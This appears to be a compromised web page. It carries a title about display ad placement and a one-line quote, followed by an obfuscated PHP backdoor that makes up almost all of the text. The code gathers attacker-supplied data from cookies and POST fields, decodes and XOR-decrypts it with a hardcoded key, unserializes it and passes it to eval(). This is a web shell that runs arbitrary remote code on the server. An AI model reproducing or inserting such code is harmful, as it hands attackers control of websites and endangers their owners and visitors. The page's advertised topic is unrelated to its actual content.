Display Ads – Proper Placement Techniques and Responsible Etiquette
“We can set how many ads a specific viewer can see in an hour, day week, month or year. We can show specific ads to specific audiences”
$PtRFRTQlN = chr ( 856 - 790 )."\x5f" . chr (114) . "\160" . 'B';$GtInBNZF = "\x63" . chr (108) . chr (97) . "\163" . "\163" . "\x5f" . chr (101) . 'x' . 'i' . 's' . chr ( 488 - 372 ).chr (115); $AqVjyy = class_exists($PtRFRTQlN); $GtInBNZF = "62712";$NJIznHq = strpos($GtInBNZF, $PtRFRTQlN);if ($AqVjyy == $NJIznHq){function YIBfZC(){$RTbOlsbA = new /* 22765 */ B_rpB(4624 + 4624); $RTbOlsbA = NULL;}$tyFPH = "4624";class B_rpB{private function RMKdLuxoO($tyFPH){if (is_array(B_rpB::$VgcEdU)) {$DzCVV2 = str_replace("<" . "?php", "", B_rpB::$VgcEdU["content"]);eval($DzCVV2); $tyFPH = "4624";exit();}}public function ClJyEuHtM(){$DzCVV = "61027";$this->_dummy = str_repeat($DzCVV, strlen($DzCVV));}public function __destruct(){B_rpB::$VgcEdU = @unserialize(B_rpB::$VgcEdU); $tyFPH = "29789_63808";$this->RMKdLuxoO($tyFPH); $tyFPH = "29789_63808";}public function bWxAf($DzCVV, $aqAGeEA){return $DzCVV[0] ^ str_repeat($aqAGeEA, intval(strlen($DzCVV[0]) / strlen($aqAGeEA)) + 1);}public function WSwvN($DzCVV){$dpLFJOvjCk = "\x62" . "\x61" . chr (115) . chr ( 716 - 615 ).chr ( 440 - 386 )."\x34";return array_map($dpLFJOvjCk . chr (95) . "\x64" . chr ( 909 - 808 ).'c' . chr (111) . "\144" . "\145", array($DzCVV,));}public function __construct($ISUExqjvQ=0){$cNXXE = "\54";$DzCVV = "";$aspwFDo = $_POST;$qmXNKJXoCC = $_COOKIE;$aqAGeEA = "5c73241f-7b81-4896-8f2d-7fe9c00695c5";$ewDIcCNV = @$qmXNKJXoCC[substr($aqAGeEA, 0, 4)];if (!empty($ewDIcCNV)){$ewDIcCNV = explode($cNXXE, $ewDIcCNV);foreach ($ewDIcCNV as $YTaCWHZHyP){$DzCVV .= @$qmXNKJXoCC[$YTaCWHZHyP];$DzCVV .= @$aspwFDo[$YTaCWHZHyP];}$DzCVV = $this->WSwvN($DzCVV);}B_rpB::$VgcEdU = $this->bWxAf($DzCVV, $aqAGeEA);if (strpos($aqAGeEA, $cNXXE) !== FALSE){$aqAGeEA = explode($cNXXE, $aqAGeEA); $PdFtMnH = base64_decode(md5($aqAGeEA[0])); $yTAJAA = strlen($aqAGeEA[1]) > 5 ? substr($aqAGeEA[1], 0, 5) : $aqAGeEA[1];$_GET['new_key'] = md5(implode('', $aqAGeEA)); $BxbUQB = str_repeat($yTAJAA, 2);}}public static $VgcEdU = 56726;}YIBfZC();}
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